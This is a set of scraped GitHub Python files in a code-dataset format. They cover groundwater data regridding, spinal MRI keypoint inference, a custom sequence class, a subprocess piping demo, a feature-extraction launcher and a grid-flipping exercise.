Regridder(method=\"multilinear\").regrid(da, like) #Flux is in m/m2/year, so can use multilinear interpolation\n \n\n#%%Clip shapes (Probably better not to do in a later stage, but useful for testing to see what's going on.)\n#ras_shapes = dict([(\n# delta, spat.rasterize(gdf.loc[[delta]], da.isel(time=-1))\n# ) for delta, da in re_das.items()])\n#\n#print(\"...clipping...\")\n#re_das = dict([(delta, da*ras_shapes[delta]) for delta, da in re_das.items()])\n##Cutoff extra borders on the side.\n#re_das = dict([(\n# delta, da.dropna(dim=\"x\", how=\"all\").dropna(dim=\"y\", how=\"all\")\n# ) for delta, da in re_das.items()])\n\n#%%Prepare points for transformation, later to be used as gcps\npoints_trans = points.loc[:, [\"Delta\", \"Type\", \"mid_coast\"]]\npoints_trans[\"x\"] = points.geometry.x\npoints_trans[\"y\"] = points.geometry.y \napexes = points.loc[points[\"Type\"]==\"apex\"].set_index(\"Delta\")\n\nfor delta in deltas:\n apex = apexes.loc[delta].geometry\n points_trans.loc[points_trans[\"Delta\"] == delta, \"x\"] -= apex.x\n points_trans.loc[points_trans[\"Delta\"] == delta, \"y\"] -= apex.y\n\npoints_trans[\"r\"], points_trans[\"phi\"] = gm._cart2pol(points_trans[\"y\"], points_trans[\"x\"])\n\n#%%Transform\nprint(\"...transforming...\")\nmid_coast = points.loc[points[\"mid_coast\"]==1].set_index(\"Delta\")\n\nfor delta, da in re_das.items():\n apex = apexes.loc[delta].geometry\n mid = mid_coast.loc[delta].geometry\n da = da.assign_coords(x = da.x-apex.x, y=da.y-apex.y) #Check if apex is really at y=0...\n r, phi = gm._cart2pol(*np.meshgrid(da.y, da.x))\n r_mid, _ = gm._cart2pol(mid.y-apex.y, mid.x-apex.x)\n \n #Scale r\n r *= df.loc[delta][\"dist_mid\"]/r_mid\n points_trans.loc[points_trans[\"Delta\"] == delta, \"r\"] *= df.loc[delta][\"dist_mid\"]/r_mid\n \n #Rotate delta, so it points northwards\n phi = (phi/deg2Rad-df.loc[delta][\"azi_mid\"])*deg2Rad\n phi_p = points_trans.loc[points_trans[\"Delta\"] == delta, \"phi\"]\n points_trans.loc[points_trans[\"Delta\"] == delta, \"phi\"] = (phi_p/deg2Rad-df.loc[delta][\"azi_mid\"])*deg2Rad\n \n r, phi = [xr.DataArray(\n data = i, coords = {\"x\" : da.x, \"y\": da.y}, dims=[\"x\", \"y\"]\n ) for i in [r, phi]]\n \n xt, yt = gm._pol2cart(r, phi)\n \n da = da.assign_coords(r = r, phi = phi, xt=xt, yt=yt)\n re_das[delta] = da\n\npoints_trans[\"xt\"], points_trans[\"yt\"] = gm._pol2cart(points_trans[\"r\"], points_trans[\"phi\"])\n\n#%%Interpolate to grid created for delta\nprint(\"...interpolating...\")\nmodel_data = {}\n\nfor delta, da in re_das.items():\n dcell = geom.loc[delta, \"dx\"]\n assert(dcell == geom.loc[delta, \"dy\"])\n \n targgrid = {}\n targgrid[\"x\"], targgrid[\"y\"] = get_targgrid(dcell,\n df.loc[delta, \"L_a\"], df.loc[delta, \"phi_f\"],\n da)\n \n poldata = {}\n poldata[\"x\"], poldata[\"y\"] = da.xt.values.T, da.yt.values.T\n for t in da.time.values:\n poldata[str(t)] = da.sel(time=t).values\n nan_idx = np.isnan(poldata[str(t)])\n \n griddata = gm.pol2griddata(poldata, nan_idx, targgrid)\n coords = {\"x\" : griddata[\"x\"][0], \"y\" : griddata[\"y\"][:, 0], \"time\" : da.time}\n \n data = np.stack([griddata[str(t)] for t in da.time.values])\n \n model_data[delta] = xr.DataArray(data=data, \n coords=coords, dims=[\"time\", \"y\", \"x\"])\n\n #Assign coordinates which we use for the control points\n model_data[delta] = assign_i_coordinate(model_data[delta], \"x\", \"ix\")\n model_data[delta] = assign_i_coordinate(model_data[delta], \"y\", \"iy\")\n\n#%%Create ground control points:\nprint(\"...creating gcps...\")\ngcps = {}\n\n#Fix order of coastal points\npoints_trans = points_trans.sort_values([\"Delta\", \"Type\", \"yt\"])\n\nfor delta in deltas:\n x_sel = points_trans.loc[points_trans[\"Delta\"] == delta, \"xt\"]\n y_sel = points_trans.loc[points_trans[\"Delta\"] == delta, \"yt\"]\n x_sel, y_sel = xr.DataArray(x_sel.values, dims=\"select\"), xr.DataArray(y_sel.values, dims=\"select\")\n select = model_data[delta].sel(x=x_sel, y=y_sel, method=\"nearest\") #ix and iy are rows and cols for gcp\n xg, yg = get_gcps_coords(df.loc[delta, \"L_a\"], df.loc[delta, \"phi_f\"])\n gcps[delta] = [rio.control.GroundControlPoint(row=r, col=c, x=x, y=-y) for r,c,x,y in zip(select.iy.values, select.ix.values, xg, yg)]\n\n#%%Warp\nprint(\"...warping...\")\nwarp_data = {}\n\nfor delta, da in model_data.items():\n data = model_data[delta].drop(labels=[\"ix\", \"iy\"]).transpose(\"time\", \"y\", \"x\") #imod-python does not want other dimensions\n data = data.assign_coords(y=data.y*-1) #Flip y-coorindates\n dsts = [xr.full_like(data,np.nan).sel(time=t) for t in data.time]\n src_crs = dst_crs = rio.crs.CRS.from_epsg(32630)\n dst_transform = imod.util.transform(dsts[0])\n \n for i, t in enumerate(data.time): \n dsts[i].values, _ = rio.warp.reproject(data.sel(time=t).values, dsts[i].values, src_crs=src_crs, \n dst_crs=dst_crs, dst_transform=dst_transform, gcps=gcps[delta])\n \n warp_data[delta] = xr.concat(dsts, dim=\"time\")\n\n#%%Clip out delta\nprint(\"...clipping...\")\nfor delta, da in warp_data.items():\n dcell = geom.loc[delta, \"dx\"]\n \n targgrid[\"x\"], targgrid[\"y\"] = gm.get_targgrid(dcell, dcell,\n df.loc[delta, \"L_a\"], df.loc[delta, \"phi_f\"]/2)\n coords = {\"x\" : targgrid[\"x\"][0], \"y\" : targgrid[\"y\"][:, 0]}\n like = xr.DataArray(np.ones(targgrid[\"x\"].shape), coords=coords, dims=[\"y\", \"x\"])\n da = da.sortby(da.y) #Ensure y is monotonically increasing\n\n warp_data[delta] = da * like\n warp_data[delta] = warp_data[delta].fillna(0.0)\n\n#%%Save\nprint(\"...saving...\")\nfor delta, da in warp_data.items():\n path_nc = os.path.join(folder_out, \"{}.nc\".format(delta))\n da.to_netcdf(path_nc, unlimited_dims=[\"time\"])\n","repo_name":"JoerivanEngelen/delta_aquifer","sub_path":"create_inputs/groundwater_abstractions.py","file_name":"groundwater_abstractions.py","file_ext":"py","file_size_in_byte":10976,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"38563075889","text":"# author: \n# contact: onlydgi@foxmail.com\n# datetime:2020/8/9 下午3:58\n# software: PyCharm\n\"\"\"\n文件说明:run for the testA50\n\"\"\"\nimport json\nimport os\nimport time\nfrom torch import nn\n\n# old_path = os.getcwd()\n# print(old_path)\n# new_path = \"/\".join(old_path.split(\"/\")[:-1])\n# os.chdir(new_path)\n# print(os.getcwd())\n\nfrom dataProcessing.makeSubmitJson import pickeT2fromtestdata\nfrom imgLabelPlot import dicom2array\nfrom imgLabelPlot import dicom_metainfo\n\n#coding=utf-8\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torch.autograd import Variable\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import transforms\n\nfrom fcn import FCN8s,VGGNet\nfrom unet import unet_model, unet_parts\nfrom classi_models.resnet import resnet18,ResNet,BasicBlock\nimport random\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nimport numpy as np\nimport cv2\n\nfrom trian import get_peak_points\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict, OrderedDict\n\nfrom imgLabelPlot import dicom_metainfo, dicom2array\n\nconfig_test = dict()\nconfig_test['showFlag'] = 0\n\n\n# os.environ['CUDA_VISIBLE_DEVICES'] = \"1\"\nconfig_test['tranform'] = 1\nconfig_test['lr'] = 0.000001\nconfig_test['momentum'] = 0.9\nconfig_test['weight_decay'] = 1e-4\nconfig_test['start_epoch'] = 0\nconfig_test['epoch_num'] = 600\nconfig_test['batch_size'] = 16\nconfig_test['save_freq'] = 10\nconfig_test['sigma'] = 5.\n# config_test['root_dir'] = r\"../data/testB50.csv\"\nconfig_test['test_jsondir'] = r\"./tcdata/round2_series_map.json\"\nconfig_test['test_img_dir'] = r\"./tcdata/round2test\"\nconfig_test['checkout'] = r\"UNet_double_PosiLoss_classi_100v20_final_model.ckpt\"\nconfig_test['disc_checkout'] = \"disc_resNet_final0919_model.ckpt\"\nconfig_test['vert_checkout'] = \"vert_resNet_final0919_model.ckpt\"\n # r\"Unet_final_model.ckpt\"\n\n# MedicalDataAugmentationTool-VerSe-master/dataset.py'\n\n\nnormMean = [0.168036]\nnormStd = [0.177935]\nnormTransform = transforms.Normalize(normMean, normStd)\nif config_test['tranform'] == 1:\n submitTestTransform = transforms.Compose([\n transforms.ToTensor()\n # ,normTransform\n ])\nelse:\n submitTestTransform=None\n\n\nclass diffuse2D(object):\n \"\"\"diffuse2D is use the nonlinear anisotropic diffusion filter to keep the edge and brighten img ,remove the noise of img.\n ``num_iter=5, delta_t=1 / 7, kappa=20, option=2``\n\n .. note::\n the this function before ToTensor\n\n Args:\n\n \"\"\"\n\n def __init__(self, num_iter=5, delta_t=1 / 7, kappa=10, option=2):\n self.num_iter = num_iter\n self.delta_t = delta_t\n self.kappa = kappa\n self.option = option\n self.hN = np.array([[0, 1, 0], [0, -1, 0], [0, 0, 0]])\n self.hS = np.array([[0, 0, 0], [0, -1, 0], [0, 1, 0]])\n self.hE = np.array([[0, 0, 0], [0, -1, 1], [0, 0, 0]])\n self.hW = np.array([[0, 0, 0], [1, -1, 0], [0, 0, 0]])\n self.hNE = np.array([[0, 0, 1], [0, -1, 0], [0, 0, 0]])\n self.hSE = np.array([[0, 0, 0], [0, -1, 0], [0, 0, 1]])\n self.hSW = np.array([[0, 0, 0], [0, -1, 0], [1, 0, 0]])\n self.hNW = np.array([[1, 0, 0], [0, -1, 0], [0, 0, 0]])\n\n def fit(self, img):\n\n diff_im = img.copy()\n\n dx = 1;\n dy = 1;\n dd = np.sqrt(2)\n\n for i in range(self.num_iter):\n nablaN = cv2.filter2D(diff_im, -1, self.hN)\n nablaS = cv2.filter2D(diff_im, -1, self.hS)\n nablaW = cv2.filter2D(diff_im, -1, self.hW)\n nablaE = cv2.filter2D(diff_im, -1, self.hE)\n nablaNE = cv2.filter2D(diff_im, -1, self.hNE)\n nablaSE = cv2.filter2D(diff_im, -1, self.hSE)\n nablaSW = cv2.filter2D(diff_im, -1, self.hSW)\n nablaNW = cv2.filter2D(diff_im, -1, self.hNW)\n\n cN = 0;\n cS = 0;\n cW = 0;\n cE = 0;\n cNE = 0;\n cSE = 0;\n cSW = 0;\n cNW = 0\n\n if self.option == 1:\n cN = np.exp(-(nablaN / self.kappa) ** 2)\n cS = np.exp(-(nablaS / self.kappa) ** 2)\n cW = np.exp(-(nablaW / self.kappa) ** 2)\n cE = np.exp(-(nablaE / self.kappa) ** 2)\n cNE = np.exp(-(nablaNE / self.kappa) ** 2)\n cSE = np.exp(-(nablaSE / self.kappa) ** 2)\n cSW = np.exp(-(nablaSW / self.kappa) ** 2)\n cNW = np.exp(-(nablaNW / self.kappa) ** 2)\n elif self.option == 2:\n cN = 1 / (1 + (nablaN / self.kappa) ** 2)\n cS = 1 / (1 + (nablaS / self.kappa) ** 2)\n cW = 1 / (1 + (nablaW / self.kappa) ** 2)\n cE = 1 / (1 + (nablaE / self.kappa) ** 2)\n cNE = 1 / (1 + (nablaNE / self.kappa) ** 2)\n cSE = 1 / (1 + (nablaSE / self.kappa) ** 2)\n cSW = 1 / (1 + (nablaSW / self.kappa) ** 2)\n cNW = 1 / (1 + (nablaNW / self.kappa) ** 2)\n\n diff_im = diff_im + self.delta_t * (\n\n (1 / dy ** 2) * cN * nablaN +\n (1 / dy ** 2) * cS * nablaS +\n (1 / dx ** 2) * cW * nablaW +\n (1 / dx ** 2) * cE * nablaE +\n\n (1 / dd ** 2) * cNE * nablaNE +\n (1 / dd ** 2) * cSE * nablaSE +\n (1 / dd ** 2) * cSW * nablaSW +\n (1 / dd ** 2) * cNW * nablaNW\n )\n return diff_im\n\n def __call__(self, tensors):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n\n Returns:\n Tensor: Normalized Tensor image.\n \"\"\"\n return [self.fit(tensor[0]) for tensor in tensors]\n\n def __repr__(self):\n return self.__class__.__name__ + '(delta_t={0}, kappa={1})'.format(self.delta_t, self.kappa)\n\nclass myTestAdata(Dataset):\n def __init__(self, jsondir, img_dir, transforms=None):\n self.transform = transforms\n self.testImg = pickeT2fromtestdata(jsondir, img_dir)\n self.diffuse2D = diffuse2D()\n # pd.read_csv(img_csvdir,header=None).values\n\n def __getitem__(self, idx):\n imgdir = self.testImg[idx]\n img_arr = dicom2array(imgdir) # 获取具体的图片数据,二维数据\n # (hieght * width)\n origi_shape = np.array(img_arr.shape)\n if img_arr.shape != (256, 256):\n img_aug = cv2.resize(img_arr, (256, 256))\n else:\n img_aug = img_arr\n\n # 'studyUid','seriesUid','instanceUid','zindx'\n tag_list = ['0020|000d', '0020|000e', '0008|0018', '0020|0013']\n studyUid, seriesUid, instanceUid, zindx= dicom_metainfo(imgdir, tag_list)\n\n\n img_aug = self.diffuse2D.fit(img_aug)\n\n if self.transform is not None:\n img_aug = self.transform(img_aug) # 在这里做transform,转为tensor等等\n # print(img_aug.shape)\n # print(img_aug)\n return origi_shape, img_aug, instanceUid, seriesUid, studyUid, zindx\n\n def __len__(self):\n return len(self.testImg)\n\ndef resize_pos(x1, y1, src_size, tar_size):\n \"\"\"\n :param x1:\n :param y1:\n :param src_size: width * hight\n :param tar_size: width * hight\n :return:\n \"\"\"\n w1 = src_size[1]\n h1 = src_size[0]\n w2 = tar_size[0]\n h2 = tar_size[1]\n y1 = np.array(y1).astype(np.float32)\n x1 = np.array(x1).astype(np.float32)\n h1 = np.array(h1).astype(np.float32)\n w1 = np.array(w1).astype(np.float32)\n h2 = np.array(h2).astype(np.float32)\n w2 = np.array(w2).astype(np.float32)\n # print(\"y1:\", y1,\"h1\", h1, \"h2\", h2)\n # print(\"x1\", x1,\"w1\", w1, \"w2\", w2)\n res_h = np.int(np.round(np.float64(y1 / h1 * h2)))\n res_w = np.int(np.round(np.float64(x1 / w1 * w2)))\n # print(x2, y2)\n return res_w, res_h\n\ndef plotPre_GT(img,gt,pred):\n j = 1\n for gtPoint in gt:\n cv2.circle(img, (gtPoint[0], gtPoint[1]), 8, thickness = 2, color=(0, 0, 255))\n cv2.putText(img, str(j), (gtPoint[0] - 10, gtPoint[1] - 2), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1)\n j += 1\n i = 1\n for pre_point in pred:\n cv2.putText(img, str(i), (pre_point[0]+4, pre_point[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (255, 0, 0), 1)\n cv2.rectangle(img, (pre_point[0]-2, pre_point[1]-2), (pre_point[0]+2, pre_point[1]+2), (255, 0, 0), 2)\n i += 1\n plt.imshow(img*255.0)\n plt.show()\n return\n\ndef oneUid(posi_res, type_res, instanceUid_res, seriesUid_res, studyUid_res, zindx):\n onestudent = OrderedDict()\n onestudent[\"studyUid\"] = studyUid_res\n onestudent[\"version\"] = \"v0.1\"\n\n # make the data value\n student_data = OrderedDict()\n student_data[\"seriesUid\"] = seriesUid_res\n student_data[\"instanceUid\"] = instanceUid_res\n\n # make the annotation value\n annotation_data = OrderedDict()\n annotation_data[\"annotator\"] = 72\n\n # make the data value\n data_point = OrderedDict()\n point_data = []\n\n # make the point data\n idx_identification = {0: 'T12-L1', 1: 'L1', 2: 'L1-L2', 3: 'L2', 4: 'L2-L3', 5: 'L3', 6: 'L3-L4', 7: 'L4',\n 8: 'L4-L5', 9: 'L5', 10: 'L5-S1'}\n\n for i in range(len(posi_res)):\n point = OrderedDict()\n point[\"coord\"] = posi_res[i]\n tag = OrderedDict()\n if i in [0, 2, 4, 6, 8, 10]:\n tag['disc'] = type_res[i]\n else:\n tag[\"vertebra\"] = type_res[i]\n tag[\"identification\"] = idx_identification[i]\n point[\"tag\"] = tag\n point[\"zIndex\"] = int(zindx)\n point_data.append(point)\n data_point['point'] = point_data\n annotation_data[\"data\"] = data_point\n student_data[\"annotation\"] = [annotation_data]\n onestudent[\"data\"] = [student_data]\n return onestudent\n\ndef makejson(pred_res_point,pred_res_type, instanceUid, pred_res_seriesUid, pred_res_studyUid, pred_res_zindx):\n sz = len(pred_res_type)\n res = []\n for i in range(sz):\n onestudy = oneUid(pred_res_point[i], pred_res_type[i], instanceUid[i], pred_res_seriesUid[i], pred_res_studyUid[i], pred_res_zindx[i])\n res.append(onestudy)\n json_str = json.dumps(res)\n cur_time_str = time.strftime(\"%Y_%m_%d_H%H_%M_%S\",time.localtime(time.time()))\n print(\"success make json file at:\", cur_time_str)\n # filename = \"../data/\" + 'submit_testB_' + cur_time_str + '.json'\n filename = \"result.json\"\n with open(filename, 'w') as json_file:\n json_file.write(json_str)\n return res\n\ndef random_pick(some_list, probabilities):\n \"\"\"\n pick random elements by probabilities\n :param some_list:\n :param probabilities:\n \"\"\"\n x = random.uniform(0, 1)\n cumulative_probability = 0.0\n for item, item_probability in zip(some_list, probabilities):\n cumulative_probability += item_probability\n if x < cumulative_probability:\n break\n return item\n\n\ndef corpRectangele(img, point, CropSz):\n \"\"\"\n\n Args:\n img:\n point:\n CropSz: wdith * hight\n\n Returns:\n\n \"\"\"\n cropIMG = []\n for idx in range(len(point)):\n p = point[idx]\n w_corp, h_corp = CropSz\n w_center, h_center = p\n img_sz_h, img_sz_w = img.shape\n # the vert smaller 4 pixel in hight.\n # if idx & 1:\n # h_corp = h_corp-4\n h_start = h_center - h_corp // 2\n h_end = h_center + h_corp // 2\n if h_start <= 0 or h_end >= img_sz_h:\n h_start = 0\n h_end = h_corp\n\n w_start = w_center - w_corp // 2\n w_end = w_center + w_corp // 2\n if w_start < 0 or w_end >= img_sz_w:\n w_start = 0\n w_end = w_corp\n new_img = img[h_start:h_end, w_start:w_end].copy()\n # new_img = new_img[:]\n # print(new_img)\n cropIMG.append(new_img)\n # cv2.rectangle(img,(w_center-w_corp//2,h_center-h_corp//2),(w_center+w_corp//2,h_center+h_corp//2),color=(0,0,255),thickness=2)\n # plt.imshow(255*img)\n # plt.show()\n # for i in range(len(cropIMG)):\n # plt.imshow(cropIMG[i])\n # plt.show()\n # cropIMG = np.array(cropIMG)\n return cropIMG\n\nif __name__ == '__main__':\n # load model from\n\n # net = unet_model.UNet(1, 11)\n # net = unet_model.UNet_twoPart(1, (6, 5))\n net = unet_model.UNet_double()\n vert_net = ResNet(BasicBlock, [2, 2, 2, 2], num_classes=2)\n disc_net = ResNet(BasicBlock, [2, 2, 2, 2], num_classes=5)\n\n\n # vgg_model = VGGNet(requires_grad = True, pretrained=False)\n # net = FCN8s(pretrained_net=vgg_model, n_class=11)\n\n net.float().cuda()\n net.eval()\n vert_net = vert_net.float().cuda()\n vert_net.eval()\n disc_net = disc_net.float().cuda()\n disc_net.eval()\n # torch.distributed.init_process_group(backend='nccl', init_method='tcp://localhost:8000', rank=0, world_size=1)\n # net = nn.parallel.DistributedDataParallel(net.float().cuda())\n if config_test['checkout'] != \"\":\n net.load_state_dict(torch.load(config_test['checkout']))\n vert_net.load_state_dict(torch.load(config_test['vert_checkout']))\n disc_net.load_state_dict(torch.load(config_test['disc_checkout']))\n else:\n print(\"choice the mode file please!\")\n\n testDataset = myTestAdata(config_test['test_jsondir'], config_test['test_img_dir'], transforms=submitTestTransform)\n testDataLoader = DataLoader(testDataset, config_test['batch_size'], False)\n Loader_num = len(testDataLoader)\n all_pred_point = []\n # all res contain: keypoint,type_pred,instanceUid, seriesUid, studyUid\n all_pred_res = []\n all_pred_res_point = []\n all_pred_res_type = []\n all_pred_res_instanceUid = []\n all_pred_res_seriesUid = []\n all_pred_res_studyUid = []\n all_pred_res_zindx = []\n # random_type = ['v1', 'v2', 'v2', 'v2', 'v3', 'v2', 'v4', 'v2', 'v5', 'v2', 'v2']\n # make the type based on probability on statistics info\n typeList_disc = ['v1', 'v2', 'v3', 'v4', 'v5']\n prob_disc = [[30/53, 5/53, 2/53, 1/53, 15/53], [30/53, 5/53, 2/53, 1/53, 15/53], [23/53, 15/53, 8/53, 2/53, 5/53], [7/53, 19/53, 12/53, 2/53, 13/53], [5/53, 18/53, 19/53, 8/53, 3/53], [15/53, 15/53, 17/53, 4/53, 2/53]]\n typeList_vert = ['v1', 'v2']\n prob_vert = [0.1, 0.9]\n idx2vertType = {'0': \"v1\", \"1\": \"v2\"}\n idx2discType = {'0': \"v1\", \"1\": \"v2\", \"2\": \"v3\", \"3\": \"v4\", \"4\": \"v5\"}\n with torch.no_grad():\n for i, (origi_shape, img_aug, instanceUid, seriesUid, studyUid, zindx) in enumerate(testDataLoader):\n print(\"test batch ===== \", i)\n if config_test['tranform'] == 0:\n img_aug = img_aug[:, np.newaxis, :, :]\n img_aug = Variable(img_aug).float().cuda()\n # heatmaps_targets = Variable(distance_maps_normalized, requires_grad=True).float().cuda()\n # keyPsoi= Variable(keyPsoi).float().cuda()\n pred_heatmaps = net(img_aug)\n cur_shape = (256, 256)\n pred_points = get_peak_points(pred_heatmaps.cpu().data.numpy()) # (N,15,2)\n batch_id = 0\n project_batch_point = []\n # (width × hieght)\n pred_type = []\n for pred_point_idx in range(len(pred_points)):\n batchPoint = pred_points[pred_point_idx]\n temp_type = []\n project_point_img = []\n # using the .shape to get the (hieght * width)\n orgi_img_shape = (origi_shape[batch_id][1], origi_shape[batch_id][0])\n # orgi_img_shape is (width , hight)\n # make the tensor to ndarray ,and change(c,h,w) to (h,w,c)\n img_original = img_aug[batch_id].cpu().numpy().transpose(1, 2, 0)\n img_fixSz = cv2.resize(img_original, (256, 256))\n img = cv2.resize(img_original, orgi_img_shape)\n # print(\"img shape:\", img_fixSz.shape)\n cropIMG = corpRectangele(img_fixSz, batchPoint, [48, 30])\n for point_idx in range(len(batchPoint)):\n point = batchPoint[point_idx]\n # point[0] is width\n point_newWidth, point_newHight = resize_pos(point[0], point[1], cur_shape, orgi_img_shape)\n project_point_img.append([point_newWidth, point_newHight])\n corpImg_input = cropIMG[point_idx]\n if config_test['showFlag'] == 1:\n plt.imshow(corpImg_input * 255.0)\n plt.show()\n corpImg_input = corpImg_input[np.newaxis,np.newaxis,:,:]\n corpImg_input = torch.Tensor(corpImg_input).float().cuda()\n # print(\"corpImg_inputsahpe:\", corpImg_input.shape)\n if point_idx&1:\n pred_vertType = vert_net(corpImg_input)[0]\n pred_vertType_idx = torch.argmax(pred_vertType, dim=0).cpu().numpy()\n # print(\"pred_vertType:\", pred_vertType_idx)\n temp_type.append(idx2vertType[str(pred_vertType_idx)])\n else:\n pred_discType = disc_net(corpImg_input)[0]\n pred_discType_idx = torch.argmax(pred_discType, dim=0).cpu().numpy()\n # print(\"pred_discType:\", pred_discType)\n temp_type.append(idx2discType[str(pred_discType_idx)])\n\n pred_type.append(temp_type)\n # print(pred_type)\n project_batch_point.append(project_point_img)\n batch_id += 1\n if config_test['showFlag'] == 1:\n plotPre_GT(255*img, [], project_point_img)\n\n all_pred_res_point.extend(project_batch_point)\n all_pred_res_type.extend(pred_type)\n all_pred_res_instanceUid.extend(instanceUid)\n all_pred_res_seriesUid.extend(seriesUid)\n all_pred_res_studyUid.extend(studyUid)\n all_pred_res_zindx.extend(zindx)\n if config_test['showFlag'] == 1:\n print(\"pred point:\", project_batch_point)\n all_pred_point.extend(project_batch_point)\n makejson(all_pred_res_point, all_pred_res_type, all_pred_res_instanceUid, all_pred_res_seriesUid, all_pred_res_studyUid, all_pred_res_zindx)\n\n","repo_name":"SkySailing/tianchi_spinalAI_detection_competetion","sub_path":"testA_submit.py","file_name":"testA_submit.py","file_ext":"py","file_size_in_byte":18235,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"}
+{"seq_id":"18695209166","text":"#coding=utf-8\r\n\r\nclass Countlist:\r\n def __init__(self,*args):#可变数量\r\n self.values=[x for x in args] #列表推导式\r\n self.count={}.fromkeys(range(len(self.values)),0) #初始化字典\r\n\r\n def __len__(self):\r\n return len(self.value)\r\n def __getitem__(self, item):\r\n self.count[item] +=1\r\n return self.values[item]\r\n\r\nc1=Countlist(1,2,2,4,7,89)\r\nc2=Countlist(98,5,6,7,78)\r\nc1[1]\r\nc2[1]\r\nc1[1]+c2[2]\r\nprint(c1.count)\r\n\r\n\r\n","repo_name":"Evandy9/eva","sub_path":"xjy047_定制序列.py","file_name":"xjy047_定制序列.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"35201815814","text":"import subprocess\nimport time\n\"\"\"\ntime.sleep(15)\ncmd = \"python log_test2.py\"\nexec = subprocess.Popen(cmd, stdout=subprocess.PIPE)\nexec.wait()\nprint(\"done\")\nfor line in exec.stdout:\n print(line.decode('utf-8').strip())\n print(line)\n\ntime.sleep(15)\n\"\"\"\n\nimport subprocess\n\np1 = subprocess.Popen('dir', shell=True, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\np2 = subprocess.Popen('sort /R', shell=True, stdin=p1.stdout, stdout = subprocess.PIPE)\n\np1.stdout.close()\nout, err = p2.communicate()\nprint(\"out\", out)\nfor i in out:\n print(i.decode(\"utf-8\"))","repo_name":"bopopescu/Py_projects","sub_path":"Py_op/Mul_process/concur_log/log_test1.py","file_name":"log_test1.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41510694495","text":"import os\nimport shutil\nimport numpy as np\nimport argparse\nfrom subprocess import Popen\nfrom time import time, sleep\n\n\ndef get_args():\n parser = argparse.ArgumentParser('Extract or Sample Point Clouds', add_help=False)\n parser.add_argument('--dataset', default='matterport3d')\n parser.add_argument('--mode', default='train', help='train | val | test')\n parser.add_argument('--accepted_cats_path', default='../../data/{}/accepted_cats.json')\n parser.add_argument('--metadata_path', default='../../data/{}/metadata.csv')\n parser.add_argument('--pc_dir', default='../../data/{}/pc_region_crops')\n parser.add_argument('--cp_dir', default='../../results/{}/LearningBased/')\n parser.add_argument('--results_folder_name', default='3D_DINO_full')\n parser.add_argument('--features_dir_name', default='features', type=str)\n parser.add_argument('--classifier_type', default='DINO', help='supervised | DINO')\n parser.add_argument('--pretrained_weights_name', default='checkpoint0200.pth', type=str,\n help=\"Name of the pretrained model.\")\n parser.add_argument('--max_coord', default=3.65, type=float, help='3.65 for MP3D')\n parser.add_argument('--theta', default=0, type=int)\n\n return parser\n\n\ndef timeit(process, process_name, sleep_time=5):\n t0 = time()\n while process.poll() is None:\n print('{} ...'.format(process_name))\n sleep(sleep_time)\n duration = (time() - t0) / 60\n print('{} Took {} minutes'.format(process_name, np.round(duration, 2)))\n\n\ndef main():\n # get the arguments\n parser = argparse.ArgumentParser('Extract or Sample Point Clouds', parents=[get_args()])\n args = parser.parse_args()\n\n crop_folders = [e for e in os.listdir(args.pc_dir.format(args.dataset)) if 'crop' in e]\n crop_folders = sorted(crop_folders, key=lambda x: int(x.split('_')[-1]))\n for i, crop_folder in enumerate(crop_folders):\n pc_dir = os.path.join(args.pc_dir, crop_folder)\n # render the results in parallel\n command = 'python -m torch.distributed.launch --nproc_per_node=1 extract_point_transformer_features_v2.py ' \\\n '--dataset {dataset} --mode {mode} --accepted_cats_path {accepted_cats_path} ' \\\n '--metadata_path {metadata_path} --pc_dir {pc_dir} --features_dir_name {features_dir_name} ' \\\n '--classifier_type {classifier_type} --results_folder_name {results_folder_name} ' \\\n '--pretrained_weights_name {pretrained_weights_name} --max_coord {max_coord} --theta {theta}'\n command = command.format(dataset=args.dataset,\n mode=args.mode,\n accepted_cats_path=args.accepted_cats_path,\n metadata_path=args.metadata_path,\n pc_dir=pc_dir,\n features_dir_name=args.features_dir_name + '_{}'.format(i+1),\n classifier_type=args.classifier_type,\n results_folder_name=args.results_folder_name,\n pretrained_weights_name=args.pretrained_weights_name,\n max_coord=args.max_coord,\n theta=args.theta)\n\n process_sampling = Popen(command, shell=True)\n timeit(process_sampling, 'Encoding crops', sleep_time=60)\n\n # move the features to the crop region directory.\n features_dirs = [args.features_dir_name + '_{}'.format(i+1) for i in range(len(crop_folders))]\n for features_dir in features_dirs:\n src = os.path.join(args.cp_dir.format(args.dataset), args.results_folder_name, features_dir)\n dest = os.path.join(args.pc_dir.format(args.dataset), features_dir)\n shutil.move(src, dest)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"reza-asad/3DSSR","sub_path":"models/LearningBased/extract_point_transformer_features_wrapper.py","file_name":"extract_point_transformer_features_wrapper.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15729379335","text":"d = []\n\nfor i in range(19):\n d.append(list(map(int,input().split()))) # 배열입력 만들기\\\n\nn = int(input())\nfor j in range(n):\n x, y = map(int,input().split())\n for k in range(19):\n if d[k][y-1] == 1:\n d[k][y-1] = 0\n else:\n d[k][y-1] = 1\n\n if d[x-1][k] == 1:\n d[x-1][k] = 0\n else:\n d[x-1][k] = 1\n\nfor m in d:\n p = list(map(str,m))\n q = ' '.join(p)\n print(q)","repo_name":"Yoonsik-Shin/TIL","sub_path":"Algorism/Codeup/문제풀이/6096.py","file_name":"6096.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
